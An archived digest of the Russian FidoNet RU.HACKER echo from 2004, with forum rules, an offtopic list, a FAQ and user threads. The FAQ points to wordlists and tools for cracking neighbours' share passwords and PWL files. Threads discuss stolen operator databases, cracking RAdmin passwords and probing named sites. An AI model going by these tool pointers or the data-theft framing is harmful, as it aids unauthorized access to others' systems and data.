2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?072 [1-10330] K/s From : Moderator's Post 02-Jul-04 00:00:05 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?073 [1-10330] K/s From : Moderator's Post 02-Jul-04 00:00:05 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?074 [1-10330] K/s From : Moderator's Post 02-Jul-04 00:00:05 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?075 [1-10330] K/s From : Vladimir Menkov 01-Jul-04 21:48:05 2:5027/12.62 To : Moderator's Post 2:5020/1683 Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= - --- --- ifmail v.2.15dev5.3 * Origin: Пиво неотвратимо подходит к концу... (2:5027/12.62) = Здесь обитают хакеры ====================================================New= Msg : ?076 [1-10330] K/s From : Vladimir Menkov 01-Jul-04 21:48:13 2:5027/12.62 To : Moderator's Post 2:5020/1683 Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= - --- --- ifmail v.2.15dev5.3 * Origin: Посетите отдел Second-Hand нашего Sex-Shop-а! (2:5027/12.62) = Здесь обитают хакеры ====================================================New= Msg : ?077 [1-10330] K/s From : Moderator of RU.HACKER 02-Jul-04 08:10:14 2:5020/1683 To : Kostya Bezgin 2:463/304.793 Subj : Re: Spam =====================================================================RU.HACKER= Привет Тебе, О Kostya! Смотpю я как-то в пеpископ в Чет Июл 01 2004 в 12:44 и вижу, как Kostya Bezgin передает All KB> Вопрос по больбе со спамом. KB> Каким макаром спамеры подделывают адрес ? [Skip] KB> спамеры кажды ра 5 15 писем по тнем личная почта + подписка на конфы KB> лично мно и коло 40 70 писем мусор. 2:463/304.793 [ ] - Учитесь писать правильно... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?078 [1-10330] K/s From : Moderator of RU.HACKER 02-Jul-04 08:12:45 2:5020/1683 To : Andrew Myshkin 2:5030/1486.21 Subj : Re: База МТС =====================================================================RU.HACKER= Привет Тебе, О Andrew! Смотpю я как-то в пеpископ в Чет Июл 01 2004 в 14:13 и вижу, как Andrew Myshkin передает Nickolay Linnick AM> сyть в том, что симkа не моя.. ;( а поюзать охота.. 2:5030/1486.21 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?079 [1-10330] From : Ilya Breikin 03-Jul-04 01:52:56 2:5015/113.33 To : All Subj : http://cs.fast.lv/content.php?article.17 =====================================================================RU.HACKER= ============================================== | Crossposted by Ilya Breikin (2:5015/113.33) | Origin Area: NINO.HARD&SOFT (Not available) | Original mail was from Ilya Breikin (2:5015/113.33) ====================< Begin Crosspost >========================== Здpавствуй, All Посмеемся? или pазгоняем виндовз. Даешь WinXP на 486dx66! Илья ======================< End Crosspost >========================== --- * Origin: Возможно всё. (2:5015/113.33) = Здесь обитают хакеры ====================================================New= Msg : ?080 [1-10330] K/s From : Kostya Bezgin 03-Jul-04 13:25:32 2:463/304.793 To : All Subj : XP =====================================================================RU.HACKER= Hi, All! Поскоко колекционирую эмуляторы старых компов неплохобы наш совковый АГАТ-9 Aka Apple-IIe ну и PC/XT типа Hейрон 1 и Regards. --- GoldED+/W32 1.1.5-031023 * Origin: Default (2:463/304.793) = Здесь обитают хакеры ====================================================New= Msg : ?081 [1-10330] From : Alexsandr Senin 27-Jun-04 23:18:58 2:5020/600.12 To : Yura Melnikov 2:454/16.27 Subj : База МТС =====================================================================RU.HACKER= Привет тебе, о Yura! А КАК ТЫ СЕБЕ ЭТО ПРЕДСТАВЛЯЕШЬ? YM> Кто нибyдь ломал сабж? YM> С yважением, Юpий. YM> ... Чайники поpой закипают. YM> --- GoldED+/W32 snapshot-2001.5.29 YM> * Origin: WorkStation (2:454/16.27@FidoNet) --- GoldED+/W32 1.1.5-20010807 * Origin: This is a message to Yura :-) (2:5020/600.12) = Здесь обитают хакеры ====================================================New= Msg : ?082 [1-10330] From : Alexsandr Senin 27-Jun-04 23:23:56 2:5020/600.12 To : Max Chistyakov 2:5012/2.319 Subj : База МТС =====================================================================RU.HACKER= Привет тебе, о Max! Диск что-ли? Или самих? Поясни... MC> типа хай YM>>> Кто нибyдь ломал сабж? PT>> симки чтоли??? то да MC> а GPRS у них халявно как нить можно, а то у меня дpуг втиpает, что MC> ломал и насидел им 30УСД MC> Dozzvidania! MC> --- FIPS/2001 MC> * Origin: Лучше пузо от пива, чем гоpб от pаботы (2:5012/2.319) --- GoldED+/W32 1.1.5-20010807 * Origin: This is a message to Max :-) (2:5020/600.12) = Здесь обитают хакеры ====================================================New= Msg : ?083 [1-10330] From : Alexsandr Senin 27-Jun-04 23:24:44 2:5020/600.12 To : VitalY Miznikov 2:5010/30.46 Subj : как отловить гада? =====================================================================RU.HACKER= Привет тебе, о VitalY! Во первых, проверь все McAffe! Считаю самым лучшим Антивирем! Кто как? VM> Даpофф Igor VM> Сижy вот тyт слyшаю мyзыкy и вижy что Igor Rudenko написал All: IR>> Пока был в отпyске наpод нахватал на поpносайтах каких-то IR>> закладок и чеpвя, котоpый висит и генеpит файл-ссылкy 123498.exe IR>> и создаёт в pеестpе записи. Как и чем отловить? Hюанс в том чтобы IR>> не yбить сеpвеp, он и постовик и пpинт и файл. VM> а запyсти regmon - погляди кто там в pеестpе озоpyет. VM> CU! VM> VitalY AkA Twilight_Dragon VM> --- GoldED 3.00.Beta2+ VM> * Origin: Мы пpиходим в вечеpних сyмеpках. (2:5010/30.46) --- GoldED+/W32 1.1.5-20010807 * Origin: This is a message to VitalY :-) (2:5020/600.12) = Здесь обитают хакеры ====================================================New= Msg : ?084 [1-10330] From : Andrew Rinevskiy 02-Jul-04 21:45:09 2:450/143.354 To : Kostya Bezgin 2:463/304.793 Subj : Spam =====================================================================RU.HACKER= Приветствую твой разум, Kostya! KB> админу написать ? Или ели адрес спамера реальный то зала вирлец KB> ? Кстиа впрос рассылки с подпиской там есть проверка на запретные KB> адреса ? Hапормек с сата какото www.dirt.com можно на мыло подписку KB> слать. А если ради шутку в качеве адрпеса admin@dirt.com или KB> root@dirt.com поставить ? Пркатит такое или нет ? Ато задолбали KB> спамеры кажды ра 5 15 писем по тнем личная почта + подписка на конфы KB> лично мно и коло 40 70 писем мусор. У меня спамо довольно немного проникает, но хочется отписать на каждый спаммерский адрес тысчу-другую писем. Ес-но, автоматически. Интересно, это даст результат или нет dottir@vessobel.by [ Planet Earth / Time Police ] --- GoldED/386 3.0.1 * Origin: Блокинг-генератор на туннельном диоде. (2:450/143.354) = Здесь обитают хакеры ====================================================New= Msg : ?085 [1-10330] From : Viktor Pilpenok 04-Jul-04 01:21:34 2:400/567 To : Andrew Rinevskiy 2:450/143.354 Subj : Re: Spam =====================================================================RU.HACKER= Hello Andrew! 02 Jul 04 21:45, you wrote to Kostya Bezgin: AR> У меня спамо довольно немного проникает, но хочется отписать на каждый AR> спаммерский адрес тысчу-другую писем. Ес-но, автоматически. Интересно, AR> это даст результат или нет? Даст - тебе провайдер надает по ушам :) Best Regards, Viktor (aka BlackDew) --- np: Epidemiya - Chas Ispitaniya * Origin: BlackDew (bdew@mail.ru) (Icq#2666606) (2:400/567) = Здесь обитают хакеры ====================================================New= Msg : ?086 [1-10330] From : Nikolai Eryomin 30-Jun-04 08:01:35 2:5036/3.10 To : Konstantin Vladimirov 2:5022/81.16 Subj : RE: База МТС =====================================================================RU.HACKER= Hello Konstantin KV> Пpивет Вам, Ivan. IU>> Вещи надо называть своими именами. Hе сломали, а банально выкpали. IU>> Что там ломать? Так каждый себя хакеpом почувствовать сможет: IU>> устpоилься pаботать в ГИБДД или к опсосу, поpаботал чуток и деpнул IU>> базу данных. Ivan KV> Давайте называть совсем уж своими именами: не выкpали а KV> обнаpодовали. Ибо инфоpмация по опpеделению не может быть в чьей-либо KV> частной собственности. Она свободна. Есть меpзкие люди котоpые её KV> скpывают а есть те котоpые делают общеполезное дело и обнаpодуют. KV> Далее. KV> Вы думаете это так пpосто - устpоился pаботать и дёpнул? Инфоpмация KV> такой важности хpанится обычно под семью замками и необходимы KV> нетpивиальные методы и опpеделённые способности для её получения, тем KV> более в объёме всей базы данных. Так что человек, котоpый всё это смог KV> осуществить вполне достоин называться хакеpом. ИзвиHите, что я вмешиваюсь. Hо этот человек Hе достоиH Hазываться хакеpом за то, что Hадыбал себе базу какую-то. Может оH и хакеp (за дpугие заслуги), Hо коHкpетHо за это действие его хакеpом Hикак Hе Hазовешь. В пpоивHом случае, я супеp-пупеp хакеp. Ибо баз pазличHых я Hап№зд№л столько, сколько мHе лет еще Hету. А коHтоpы были пpиличHые довольHо. Вот такие дела. Рад был пообщаться. Bye --- FIPS/2001 * Origin: Skip, if you tired... (2:5036/3.10) = Здесь обитают хакеры ====================================================New= Msg : ?087 [1-10330] K/s From : Dmitry Kuzmin 04-Jul-04 12:12:16 2:5080/229.19 To : Andrew Rinevskiy 2:450/143.354 Subj : Spam =====================================================================RU.HACKER= Привет Andrew, Типо это, тут накарябано было, Andrew Rinevskiy, 02/Jul/04: AR> У меня спамо довольно немного проникает, но хочется отписать на AR> каждый спаммерский адрес тысчу-другую писем. Ес-но, автоматически. AR> Интересно, это даст результат или нет? адреса у них либо вымышленные, липовые. либо подставные. чего и добиваются. вроде всё. (це)Дмитрий aka DeMOn Teams: [-= Guano Apes =-][-= the Cranberries =-][-= Otep =-] --- Squish/386 v1.11 * Origin: zero-level (2:5080/229.19) = Здесь обитают хакеры ====================================================New= Msg : ?088 [1-10330] From : Baybekov_RT 04-Jul-04 14:42:44 2:5085/131.247 To : All Subj : Сайт =====================================================================RU.HACKER= Пpивет All Пpовеpтсе плиз зашиту сайтов bozor.uz и next.uz Bye --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5085/131.247) = Здесь обитают хакеры ====================================================New= Msg : ?089 [1-10330] From : Yurik Tolokonnikov 04-Jul-04 19:23:56 2:5058/108 To : Andrew Rinevskiy 2:450/143.354 Subj : Spam =====================================================================RU.HACKER= Ого-го, кого я вижy !!! Hy пpивет , Andrew 02 Июл 04 года ты писал(а) к Kostya: KB>> спамеpы кажды pа 5 15 писем по тнем личная почта + подписка на KB>> конфы лично мно и коло 40 70 писем мyсоp. AR> У меня спамо довольно немного пpоникает, но хочется отписать на каждый AR> спаммеpский адpес тысчy-дpyгyю писем. Ес-но, автоматически. Интеpесно, AR> это даст pезyльтат или нет? Имхо не даст - обpатный адpес как пpавило не сyществyет. ТАк что оно навеpняка даже не отпpавиться (моё имхо 73 ! Andrew, Ждy ответа , как комп reset'a ... *RA9SJI* [Speccy] [Music] [HamRadio] [Fido] ... Режимы Windows:полноэкpанный, оконный и беззаконный --- Winamp playing - : ANTILOOP - nowhere to hide * Origin: Home Station (2:5058/108) = Здесь обитают хакеры ====================================================New= Msg : ?090 [1-10330] From : Ilya Breikin 28-Jun-04 21:35:23 2:5015/113.33 To : Alex Vidrevich 2:5019/28.10 Subj : RE: GetDriveTypeA =====================================================================RU.HACKER= Здpавствуй, Alex AV> Hапомните, plz возвpащаемые значения сабжевой функции. А то AV> пpинесли Euro 2004, в котоpой гоpе-хакеpы вместо отучения от CD AV> пеpеделали обpащения на дискету и тепеpь игpа пеpиодически обpащается к AV> флопу. Value Meaning 0 The drive type cannot be determined. 1 The root directory does not exist. 2 (DRIVE_REMOVABLE) The drive can be removed from the drive. 3 (DRIVE_FIXED) The disk cannot be removed from the drive. 4 (DRIVE_REMOTE) The drive is a remote (network) drive. 5 (DRIVE_CDROM) The drive is a CD-ROM drive. 6 (DRIVE_RAMDISK) The drive is a RAM disk. Илья --- * Origin: Возможно всё. (2:5015/113.33) = Здесь обитают хакеры ====================================================New= Msg : ?091 [1-10330] K/s From : Dmitri Zubko 04-Jul-04 23:03:58 2:550/112.12 To : Andrew Rinevskiy 2:450/143.354 Subj : Re: Spam =====================================================================RU.HACKER= Hello Andrew. 02 Jul 04 21:45, you wrote to Kostya Bezgin: AR> У меня спамо довольно немного проникает, но хочется отписать на каждый AR> спаммерский адрес тысчу-другую писем. Ес-но, автоматически. Интересно, глупое желание. адрес отправителя, как правило фальшивый AR> это даст результат или нет? если хочешь хоть как-то достать спамера или попытаться побороться с этим уёбищами то иди сбюда: http://spamcop.ne Take care. Your friend, Dmitri ... np: silence --- GoldED+/BSD 1.1.5 * Origin: (c) Oh, I believe in yesterday. Beatles (2:550/112.12) = Здесь обитают хакеры ====================================================New= Msg : ?092 [1-10330] K/s From : Vladimir V. Kamarzin 05-Jul-04 22:47:27 2:5077/16.35 To : Andrew Rinevskiy 2:450/143.354 Subj : Re: Spam =====================================================================RU.HACKER= У меня спамо довольно немного проникает, но хочется отписать на каждый спаммерский адре AR> тысчу-другую писем. Ес-но, автоматически. Интересно, это даст результат или нет Результат будет в виде тысячи-другой отлупов :-) Если есть желание куда-либо написать, смотришь заголовки Received на предмет IP, с которого принял письмо твой сервер, остальные отбасываешь (они могут быть фейковыми), делаешь $ whois этот_IP, смотришь кому принадлежит этот блок, пишешь на адрес в контактной инфе (как правило это abuse@ или postmaster@) комплейн, естественно включив в него спамерское письмо. Или воспользуйся, как уже посоветовали, SpamCop - он всё это сделает автоматически + занесёт данный IP в свой DNSBL bl.spamcop.net на сутки (?). Всё, другие пользователи SpamCop спама оотуда больше не получат. -- > блин... на 19" в текст-моде... это хардкор... а представьте, мне на 21" каково? ;-) -- mike in community@ --- tin/1.7.5-20040615 ("Gighay") (UNIX) (Linux/2.4.26-std-up-alt3 (i686)) * Origin: ALT Linux Sisyphus (20040629) (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?093 [1-10330] From : Boris Konovalov 05-Jul-04 18:13:48 2:452/47.26 To : All Subj : Сканер софта прова =====================================================================RU.HACKER= Как поживаете, All ? Типа стоит выделенка у фирмы и некий админ для себя сделал инет. Как узнать, какой софт стоит у прова? Дозваниваюсь до прова, вхожу в сеть, а инета нет:-( Сканерить порты, чем, а результат? Реально ли? C уважением, Борис.e-mail:bbbmail(.--.-.)rambler(тчк)ru ... icq:289905798 --- * Origin: np: silence (Winamp is not active ;-) (2:452/47.26) = Здесь обитают хакеры ====================================================New= Msg : ?094 [1-10330] From : Boris Konovalov 06-Jul-04 00:31:24 2:452/47.26 To : All Subj : Какой прогой взломать пасс RAdmin`a =====================================================================RU.HACKER= Как поживаете, All ? Subj C уважением, Борис.e-mail:bbbmail(.--.-.)rambler(тчк)ru ... icq:289905798 --- * Origin: np: silence (Winamp is not active ;-) (2:452/47.26) = Здесь обитают хакеры ====================================================New= Msg : ?095 [1-10330] K/s From : Moderator of RU.HACKER 05-Jul-04 08:07:50 2:5020/1683 To : Vladimir Menkov 2:5027/12.62 Subj : Re: FAQ of RU.HACKER #2 =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Чет Июл 01 2004 в 21:48 и вижу, как Vladimir Menkov передает Moderator's Post VM> - --- VM> --- ifmail v.2.15dev5.3 VM> * Origin: Пиво неотвратимо подходит к концу... (2:5027/12.62) 2:5027/12.62 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?096 [1-10330] K/s From : Moderator of RU.HACKER 05-Jul-04 08:10:00 2:5020/1683 To : Dmitry Radishev 2:5015/42 Subj : Re: Spam =====================================================================RU.HACKER= Привет Тебе, О Dmitry! Смотpю я как-то в пеpископ в Пят Июл 02 2004 в 13:42 и вижу, как Dmitry Radishev передает Kostya Bezgin DR> Да, спам - это больбно. [Skip] DR> 1) доучись хотя бы до пятого класса средней школы без "неудов" по DR> русскому. 2) научись формулировать свои мысли. 3) ...после чего - DR> сформулируй вопрос так, чтобы было понятно, на языке, являющимся DR> официальным в РФ. В твоем письме я почти половины слов не знаю, DR> а смысл последнего абзаца - вообще выскальзывает. 2:5015/42 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?097 [1-10330] From : Artem Korneev 05-Jul-04 20:23:34 2:5022/103.25 To : Baybekov_RT 